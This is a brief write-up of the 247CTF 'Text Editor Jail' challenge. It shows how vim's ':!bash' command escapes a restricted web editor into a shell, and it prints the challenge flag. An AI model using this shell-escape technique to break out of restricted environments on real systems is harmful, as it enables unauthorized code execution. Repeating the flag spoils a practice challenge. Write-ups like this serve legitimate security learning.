247CTF - The Text Editor Jail

Posted on 2026-02-26 Edited on 2026-02-27 In ctf Views: Disqus: Word count in article: 66 Reading time ≈ 1 mins.

Escape a text editor jail and execute code to retrieve the flag.

Vulnerability

The web text editor uses vim commands. Vim's :!command syntax can execute arbitrary shell commands, breaking out of the restricted environment.

Use vim's command execution to escape the jail:

:!bash

This opens a bash shell where you can execute programs:

1
2
3

bash-4.3$ ls
run_for_flag
bash-4.3$ ./run_for_flag

247CTF{c69287be15653ac9ab47dcd3f2fcd8fa}